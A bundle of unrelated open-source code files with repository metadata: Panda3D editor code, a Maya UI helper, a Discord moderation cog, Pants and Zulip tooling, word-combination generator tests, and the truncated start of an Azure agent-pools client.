# If nothing specified, try selected node path
nodePath = self.selected.last
if nodePath:
if nodePath.hasColor():
doneColor = nodePath.getColor()
flashColor = VBase4(1) - doneColor
flashColor.setW(1)
else:
doneColor = None
flashColor = VBase4(1,0,0,1)
# Temporarily set node path color
nodePath.setColor(flashColor)
# Clean up color in a few seconds
t = taskMgr.doMethodLater(1.5,
# This is just a dummy task
self.flashDummy,
'flashNodePath')
t.nodePath = nodePath
t.doneColor = doneColor
# This really does all the work
t.uponDeath = self.flashDone
def flashDummy(self, state):
# Real work is done in upon death function
return Task.done
def flashDone(self,state):
# Return node Path to original state
if state.nodePath.isEmpty():
# Node path doesn't exist anymore, bail
return
if state.doneColor:
state.nodePath.setColor(state.doneColor)
else:
state.nodePath.clearColor()
editor = myLevelEditor(parent = base.tkRoot)
run()
| {
"content_hash": "eab1b1a0d231e6407e97b6f1d6359e82",
"timestamp": "",
"source": "github",
"line_count": 1707,
"max_line_length": 230,
"avg_line_length": 44.85120093731693,
"alnum_prop": 0.5351157900236413,
"repo_name": "jjkoletar/panda3d",
"id": "e47df9ddcbdbcbafa47840497f30110cedca1ce9",
"size": "76562",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "contrib/src/sceneeditor/sceneEditor.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "6435690"
},
{
"name": "C++",
"bytes": "31389522"
},
{
"name": "Emacs Lisp",
"bytes": "166274"
},
{
"name": "HTML",
"bytes": "8081"
},
{
"name": "Java",
"bytes": "3777"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Logos",
"bytes": "5504"
},
{
"name": "NSIS",
"bytes": "91955"
},
{
"name": "Nemerle",
"bytes": "7733"
},
{
"name": "Objective-C",
"bytes": "12290"
},
{
"name": "Objective-C++",
"bytes": "298197"
},
{
"name": "Pascal",
"bytes": "53710"
},
{
"name": "Perl",
"bytes": "206982"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "752377"
},
{
"name": "Python",
"bytes": "5860103"
},
{
"name": "Rebol",
"bytes": "421"
},
{
"name": "Shell",
"bytes": "59984"
},
{
"name": "Visual Basic",
"bytes": "136"
}
],
"symlink_target": ""
} |
"""
Coplanar joint orient tool 0.9.0
Ilya Seletsky 2015
TODO (known issues):
-Preview plane size setting (Width and Height)
-Handle when scene is closed while window open to reset things if possible
-Make the preview plane creation somehow not contribute to the undo history if possible or find a different way to display a preview plane
-Save settings between runs.
-Fix window not shrinking properly when switching between plane modes.
-Figure out what else crashes
Stretch goals:
-Joint preview. Preview of how the joints will be oriented in real time without hitting apply button.
-Interactive plane mode. Move a plane around in real time
-See if I can make UI more intuitive/self documenting and with a bunch of pretty pictures
-Auto compute preview plane size and position based on selected joints.
-Optimize UI change code to prevent unnecessary updates. Not a real huge issue.
-Redo the UI with PyQt to make it more versatile and resizable, with localizable strings, etc...
"""
"""
Wrapper around some value and its associated UI, and makes the two stay in sync
"""
class ValueBase(object):
def __init__(self):
self.value = None
self.rootUI = None
self.onChangeFunc = None
def setValue(self, value):
pass
def callChangeFunc(self):
if(self.onChangeFunc is not None):
self.onChangeFunc(self.value)
def setEnabled(self, enabled):
pass
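# A minimal usage sketch (not part of the original tool): a hypothetical subclass that
# pairs a float value with a Maya floatFieldGrp, assuming maya.cmds is imported as cmds.
# class FloatValue(ValueBase):
#     def __init__(self, label, default=0.0, onChangeFunc=None):
#         super(FloatValue, self).__init__()
#         self.value = default
#         self.onChangeFunc = onChangeFunc
#         # changeCommand pushes edits made in the UI back into the value
#         self.rootUI = cmds.floatFieldGrp(label=label, value1=default,
#             changeCommand=lambda *_: self.setValue(
#                 cmds.floatFieldGrp(self.rootUI, query=True, value1=True)))
#     def setValue(self, value):
#         self.value = value
#         cmds.floatFieldGrp(self.rootUI, edit=True, value1=value)
#         self.callChangeFunc()
#     def setEnabled(self, enabled):
#         cmds.floatFieldGrp(self.rootUI, edit=True, enable=enabled)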
"content_hash": "b305a4047c5f58cd27b1fe123bcbf6df",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 138,
"avg_line_length": 37.61538461538461,
"alnum_prop": 0.7191547375596455,
"repo_name": "ill/CoplanarJointOrient",
"id": "508622f349766c878143f0d8e4b7cdd4d4b93302",
"size": "1467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MayaUIValue/ValueBase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "79748"
}
],
"symlink_target": ""
} |
import asyncio

import discord
from discord.ext import commands
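# Channel IDs that propagateMute should leave untouched when applying overwrites.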
AVOID = ['342891382584770560', '300564141096304650', '360722519860445184', '312038519294001152', '321832332279676928']
class Modtools:
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
async def propagateMute(self, ctx):
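"""Apply deny overwrites for the muted role to every channel not listed in AVOID."""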
if self.bot.Henry(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
overwrite = discord.PermissionOverwrite()
setattr(overwrite, 'send_messages', False)
setattr(overwrite, 'manage_messages', False)
setattr(overwrite, 'manage_channels', False)
setattr(overwrite, 'manage_server', False)
setattr(overwrite, 'manage_nicknames', False)
setattr(overwrite, 'manage_roles', False)
for channel in ctx.message.server.channels:
if channel.id not in AVOID:
await self.bot.edit_channel_permissions(channel, MUTED_ROLE, overwrite)
# @commands.command(pass_context=True)
# async def lock(self, ctx):
# """Locks the current channel."""
# for role in ctx.message.server.roles:
# if role.id == '338575090847580160':
# MUTED_ROLE = role
# if role.id == '296466915235332106':
# BOTS_ROLE = role
# if self.minion(ctx):
# everyone = []
# for user in ctx.message.server.members:
# if ctx.message.channel.permissions_for(user).send_messages and BOTS_ROLE not in user.roles: #don't mute bots
# everyone.append(user)
# for user in everyone:
# await self.bot.add_roles(user, MUTED_ROLE)
# await self.bot.say("Locking Channel")
# else:
# await self.bot.say("You ain't no mod, shoo!")
@commands.command(pass_context=True)
async def unlock(self, ctx):
"""Unlocks the current channel."""
if self.minion(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
everyone = []
for user in ctx.message.server.members:
if ctx.message.channel.permissions_for(user).send_messages:
everyone.append(user)
for user in everyone:
if MUTED_ROLE in user.roles:
await self.bot.remove_roles(user, MUTED_ROLE)
await self.bot.say("Unlocking Channel")
else:
await self.bot.say("You ain't no mod, shoo!")
async def ch_perms(self, channel, user, value):
"""Helper function"""
overwrite = discord.PermissionOverwrite()
overwrite.send_messages = value
await self.bot.edit_channel_permissions(channel, user, overwrite)
@commands.command(pass_context=True)
async def unrestrict(self, ctx, *msg):
"""Undo any restrictions on a user for all channels.
Usage: !unrestrict [users..]
"""
if self.minion(ctx):
channels = ctx.message.server.channels
for user in ctx.message.mentions:
await self.bot.say("Unrestricting user "+user.name)
for ch in channels:
await self.ch_perms(ch, user, None) #None sets to default(inherited) value.
else:
await self.bot.say("You ain't no mod, shoo!")
@commands.command(pass_context=True)
async def restrict(self, ctx):
if self.minion(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
await self.bot.add_roles(ctx.message.mentions[0], MUTED_ROLE)
await self.bot.say("{} has been muted.".format(ctx.message.mentions[0].mention))
else:
await self.bot.say("You ain't no mod, shoo!")
def minion(self, ctx):
for role in ctx.message.author.roles:
if "314296819272122368" == role.id:
return True
return False
@commands.command(pass_context=True)
async def modsay(self, ctx, *msg):
"""Give a stern message.
Heavily inspired by brenfan's .em code <3
"""
author = ctx.message.author
if author.permissions_in(ctx.message.channel).manage_channels or author.server_permissions.manage_channels:
try:
color = red
except Exception:
color = discord.Colour(0xff0000)
string = "\n\n["+" ".join(msg)+"]()"
embed = discord.Embed(description = string, color = color, title="An Echo From the Heavens Says...", footer="Moderator Warning")
embed.set_author(name=author.display_name, icon_url = author.avatar_url)
embed.set_footer(text="Moderator Warning")
await self.bot.say(embed=embed)
try:
await self.bot.delete_message(ctx.message)
except Exception:
print("Not allowed to delete message")
@commands.command(pass_context=True)
async def clear(self, ctx, amount):
"""Clear set amount of messages
"""
if len(ctx.message.mentions) > 0:
send_msg = await self.bot.say("Feature coming. Bug Henry.")
# await self.bot.purge_from(ctx.message.channel, limit = 50, check=is_me)
        else:
            # purge_from expects an integer limit; with no check predicate every message counts
            await self.bot.purge_from(ctx.message.channel, limit=int(amount))
            send_msg = await self.bot.say("{} message(s) has been deleted.".format(amount))
await asyncio.sleep(3)
await self.bot.delete_message(send_msg)
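    # A minimal sketch (not part of the original cog) of how the mention-based clear
    # hinted at above could filter messages: build a predicate over the mentioned users
    # and pass it to purge_from as the `check` callable. The name `purge_check_for`
    # is hypothetical.
    @staticmethod
    def purge_check_for(mentioned_users):
        """Return a predicate matching messages authored by any of the mentioned users."""
        targets = set(mentioned_users)

        def check(message):
            return message.author in targets

        return check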
def setup(bot):
bot.add_cog(Modtools(bot))
| {
"content_hash": "f427561e59e699ffecb931857763bace",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 134,
"avg_line_length": 36.52482269503546,
"alnum_prop": 0.6566990291262136,
"repo_name": "matthew-morrison/csss-minion",
"id": "9ad3d7b62be83b51903c09bbc948de1c39cc4602",
"size": "5150",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "modtools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "26"
},
{
"name": "Python",
"bytes": "143033"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.python.pants_requirement import PantsRequirement
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_requirements import PythonRequirements
from pants.backend.python.targets.python_app import PythonApp
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_distribution import PythonDistribution
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.backend.python.tasks.build_local_python_distributions import \
BuildLocalPythonDistributions
from pants.backend.python.tasks.gather_sources import GatherSources
from pants.backend.python.tasks.local_python_distribution_artifact import \
LocalPythonDistributionArtifact
from pants.backend.python.tasks.pytest_prep import PytestPrep
from pants.backend.python.tasks.pytest_run import PytestRun
from pants.backend.python.tasks.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks.python_bundle import PythonBundle
from pants.backend.python.tasks.python_isort import IsortPythonTask
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.backend.python.tasks.python_run import PythonRun
from pants.backend.python.tasks.resolve_requirements import ResolveRequirements
from pants.backend.python.tasks.select_interpreter import SelectInterpreter
from pants.backend.python.tasks.setup_py import SetupPy, create_setup_py_rules
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.resources import Resources
from pants.goal.task_registrar import TaskRegistrar as task
def build_file_aliases():
return BuildFileAliases(
targets={
PythonApp.alias(): PythonApp,
PythonBinary.alias(): PythonBinary,
PythonLibrary.alias(): PythonLibrary,
PythonTests.alias(): PythonTests,
PythonDistribution.alias(): PythonDistribution,
'python_requirement_library': PythonRequirementLibrary,
Resources.alias(): Resources,
},
objects={
'python_requirement': PythonRequirement,
'python_artifact': PythonArtifact,
'setup_py': PythonArtifact,
},
context_aware_object_factories={
'python_requirements': PythonRequirements,
'pants_requirement': PantsRequirement,
}
)
def register_goals():
task(name='interpreter', action=SelectInterpreter).install('pyprep')
task(name='build-local-dists', action=BuildLocalPythonDistributions).install('pyprep')
task(name='requirements', action=ResolveRequirements).install('pyprep')
task(name='sources', action=GatherSources).install('pyprep')
task(name='py', action=PythonRun).install('run')
task(name='pytest-prep', action=PytestPrep).install('test')
task(name='pytest', action=PytestRun).install('test')
task(name='py', action=PythonRepl).install('repl')
task(name='setup-py', action=SetupPy).install()
task(name='py', action=PythonBinaryCreate).install('binary')
task(name='py-wheels', action=LocalPythonDistributionArtifact).install('binary')
task(name='isort', action=IsortPythonTask).install('fmt')
task(name='py', action=PythonBundle).install('bundle')
def rules():
return create_setup_py_rules()
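# Illustrative only, not part of the register module: the aliases registered above are
# what make target definitions like the following available in a BUILD file. The target
# names and file paths are hypothetical.
#
#   python_library(
#       name='lib',
#       sources=['*.py'],
#   )
#
#   python_binary(
#       name='bin',
#       source='main.py',
#       dependencies=[':lib'],
#   )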
| {
"content_hash": "79a0abe7e9168c5c2474ab5aafe0bf91",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 93,
"avg_line_length": 48.5945945945946,
"alnum_prop": 0.7906006674082313,
"repo_name": "baroquebobcat/pants",
"id": "e8cb9dae58141ae0de1d0757e2fa8bc475488f6e",
"size": "3743",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/python/pants/backend/python/register.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "343"
},
{
"name": "C++",
"bytes": "1138"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "2347"
},
{
"name": "HTML",
"bytes": "49289"
},
{
"name": "Java",
"bytes": "490864"
},
{
"name": "JavaScript",
"bytes": "33289"
},
{
"name": "Python",
"bytes": "5907131"
},
{
"name": "Rust",
"bytes": "494664"
},
{
"name": "Scala",
"bytes": "76065"
},
{
"name": "Shell",
"bytes": "75742"
},
{
"name": "Thrift",
"bytes": "2953"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from __future__ import absolute_import
import os
from os.path import abspath
import sys
import subprocess
import re
from collections import defaultdict
import argparse
from six.moves import filter
from typing import Union, List, Dict
def get_ftype(fpath, use_shebang):
# type: (str, bool) -> str
ext = os.path.splitext(fpath)[1]
if ext:
return ext[1:]
elif use_shebang:
# opening a file may throw an OSError
with open(fpath) as f:
first_line = f.readline()
if re.search(r'^#!.*\bpython', first_line):
return 'py'
elif re.search(r'^#!.*sh', first_line):
return 'sh'
elif re.search(r'^#!.*\bperl', first_line):
return 'pl'
elif re.search(r'^#!.*\bnode', first_line):
return 'js'
elif re.search(r'^#!.*\bruby', first_line):
return 'rb'
elif re.search(r'^#!', first_line):
print('Error: Unknown shebang in file "%s":\n%s' % (fpath, first_line), file=sys.stderr)
return ''
else:
return ''
else:
return ''
def list_files(targets=[], ftypes=[], use_shebang=True, modified_only=False,
exclude=[], group_by_ftype=False):
# type: (List[str], List[str], bool, bool, List[str], bool) -> Union[Dict[str, List[str]], List[str]]
"""
List files tracked by git.
Returns a list of files which are either in targets or in directories in targets.
If targets is [], list of all tracked files in current directory is returned.
Other arguments:
ftypes - List of file types on which to filter the search.
If ftypes is [], all files are included.
use_shebang - Determine file type of extensionless files from their shebang.
modified_only - Only include files which have been modified.
exclude - List of paths to be excluded, relative to repository root.
group_by_ftype - If True, returns a dict of lists keyed by file type.
If False, returns a flat list of files.
"""
ftypes = [x.strip('.') for x in ftypes]
ftypes_set = set(ftypes)
# Really this is all bytes -- it's a file path -- but we get paths in
# sys.argv as str, so that battle is already lost. Settle for hoping
# everything is UTF-8.
repository_root = subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip().decode('utf-8')
exclude_abspaths = [os.path.join(repository_root, fpath).rstrip('/') for fpath in exclude]
cmdline = ['git', 'ls-files'] + targets
if modified_only:
cmdline.append('-m')
files_gen = (x.strip() for x in subprocess.check_output(cmdline, universal_newlines=True).split('\n'))
# throw away empty lines and non-files (like symlinks)
files = list(filter(os.path.isfile, files_gen))
result_dict = defaultdict(list) # type: Dict[str, List[str]]
result_list = [] # type: List[str]
for fpath in files:
# this will take a long time if exclude is very large
absfpath = abspath(fpath)
if any(absfpath == expath or absfpath.startswith(expath + '/')
for expath in exclude_abspaths):
continue
if ftypes or group_by_ftype:
try:
filetype = get_ftype(fpath, use_shebang)
except (OSError, UnicodeDecodeError) as e:
etype = e.__class__.__name__
print('Error: %s while determining type of file "%s":' % (etype, fpath), file=sys.stderr)
print(e, file=sys.stderr)
filetype = ''
if ftypes and filetype not in ftypes_set:
continue
if group_by_ftype:
result_dict[filetype].append(fpath)
else:
result_list.append(fpath)
if group_by_ftype:
return result_dict
else:
return result_list
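# A small usage sketch (not part of the original module): grouping tracked Python and
# shell files by type. The 'tools/' target below is only illustrative.
#
#   by_type = list_files(targets=['tools/'], ftypes=['py', 'sh'], group_by_ftype=True)
#   for ftype, paths in by_type.items():
#       print(ftype, len(paths))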
if __name__=="__main__":
parser = argparse.ArgumentParser(description="List files tracked by git and optionally filter by type")
parser.add_argument('targets', nargs='*', default=[],
help='''files and directories to include in the result.
If this is not specified, the current directory is used''')
parser.add_argument('-m', '--modified', action='store_true', default=False, help='list only modified files')
parser.add_argument('-f', '--ftypes', nargs='+', default=[],
help="list of file types to filter on. All files are included if this option is absent")
parser.add_argument('--ext-only', dest='extonly', action='store_true', default=False,
help='only use extension to determine file type')
parser.add_argument('--exclude', nargs='+', default=[],
help='list of files and directories to exclude from results, relative to repo root')
args = parser.parse_args()
listing = list_files(targets=args.targets, ftypes=args.ftypes, use_shebang=not args.extonly,
modified_only=args.modified, exclude=args.exclude)
for l in listing:
print(l)
| {
"content_hash": "843f55d91d22daa7b405288041f357d5",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 112,
"avg_line_length": 42.15447154471545,
"alnum_prop": 0.6005785920925747,
"repo_name": "Vallher/zulip",
"id": "61ac5c12a9efe6e474a1f6fca991c1a2eef5acab",
"size": "5207",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/lister.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "182566"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5515"
},
{
"name": "HTML",
"bytes": "385288"
},
{
"name": "JavaScript",
"bytes": "1571752"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "95624"
},
{
"name": "Python",
"bytes": "1862563"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "32357"
}
],
"symlink_target": ""
} |
"""
Test if combinations of words are working as expected.
"""
import unittest
from tests.utils import get_words_generator
from itertools import product
from thechronic.utils import is_iterable
from thechronic.thechronic import TheChronic
class CombinationsTestCase(unittest.TestCase):
def _assert_iterable_contains(self, member, container):
if not is_iterable(member):
member = (member, )
for m in member:
self.assertIn(m, container)
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.TESTS_PATH = 'tests/'
cls.RES_PATH = cls.TESTS_PATH + 'res/'
cls.WORDS1_PATH = cls.RES_PATH + 'words1.txt'
cls.WORDS2_PATH = cls.RES_PATH + 'words2.txt'
def setUp(self):
self.words1 = ['cat', 'dog', 'rat']
self.words2 = ['the', 'chronic', '1992']
def tearDown(self):
pass
def test_combinations_one_word(self):
thechronic = TheChronic(words=self.words1)
        # generate combinations of one word only
        res = list(thechronic.combine(num_words=1))
self.assertEqual(len(res), 3)
self.assertCountEqual(res, self.words1)
# make sure that num_words defaults to 1
res = list(thechronic.combine())
self.assertEqual(len(res), 3)
self.assertCountEqual(res, self.words1)
def test_combinations_multiple_words_single_source(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1, repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 27)
self.assertCountEqual(res, expected_result)
def test_combinations_multiple_words_multiple_sources(self):
thechronic = TheChronic(words=[self.words1, self.words2])
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
def test_combinations_with_build_up(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'cat', 'dog', 'rat',
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 12)
self.assertCountEqual(res, expected_result)
res = list(thechronic.combine(num_words=5, build_up=True))
self.assertEqual(len(res), 363)
def test_combinations_load_from_single_file(self):
thechronic = TheChronic(files=self.WORDS1_PATH)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1, repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 27)
self.assertCountEqual(res, expected_result)
def test_combinations_load_from_multiple_file(self):
thechronic = TheChronic(files=(self.WORDS1_PATH, self.WORDS2_PATH))
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
    def test_combinations_load_from_words_and_file(self):
thechronic = TheChronic(words=self.words1, files=self.WORDS2_PATH)
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
def test_min_length(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2, build_up=True, min_length=4))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
def test_max_length(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'cat', 'dog', 'rat',
]
res = list(thechronic.combine(num_words=2, build_up=True, max_length=3))
self.assertEqual(len(res), 3)
self.assertCountEqual(res, expected_result)
res = list(thechronic.combine(num_words=2, build_up=True, max_length=2))
self.assertEqual(len(res), 0)
self.assertCountEqual(res, [])
def test_min_max_length(self):
thechronic = TheChronic(words=['the', 'game', 'the documentary',
'the doctor\'s advocate', 'l.a.x.', 'red', '1992'])
expected_result = ['the', 'game', 'red', '1992']
res = list(thechronic.combine(num_words=1, build_up=True,
min_length=2, max_length=4))
self.assertEqual(len(res), 4)
self.assertCountEqual(res, expected_result)
def test_ending_numbers(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat201', 'catdog102', 'catrat001',
'dogcat101', 'dogdog102', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=False)
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 12012)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_with_build_up(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'cat1', 'dog23', 'cat17', 'rat12',
'catcat1', 'catdog00', 'catrat021',
'dogcat22', 'dogdog99', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=True))
self.assertEqual(len(res), 13332)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_no_combine_build_up(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat1', 'catdog00', 'catrat021',
'dogcat22', 'dogdog99', 'dograt122',
'ratcat500', 'ratdog404', 'ratrat007'
]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=False))
self.assertEqual(len(res), 9999)
self._assert_iterable_contains(expected_result, res)
def test_ending_numbers_empty_wordlist(self):
thechronic = TheChronic()
expected_result = ['201', '19', '0', '022', '000',]
thechronic.add_numeric(digits=3, build_up=True)
res = list(thechronic.combine(num_words=2, build_up=False))
self.assertEqual(len(res), 1110)
self._assert_iterable_contains(expected_result, res)
| {
"content_hash": "2cee2da0d732df4eb3dcb8e9cdcfb26c",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 80,
"avg_line_length": 37.05725190839695,
"alnum_prop": 0.6053146565042744,
"repo_name": "iluxonchik/the-chronic",
"id": "decd08f8737ef60581c1f25d6826a461ef1542d1",
"size": "9709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_combinations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "18415"
}
],
"symlink_target": ""
} |
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import (
build_create_or_update_request,
build_delete_request,
build_get_available_agent_pool_versions_request,
build_get_request,
build_get_upgrade_profile_request,
build_list_request,
build_upgrade_node_image_version_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2021_05_01.aio.ContainerServiceClient`'s
:attr:`agent_pools` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, resource_group_name: str, resource_name: str, **kwargs: Any) -> AsyncIterable["_models.AgentPool"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPool or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
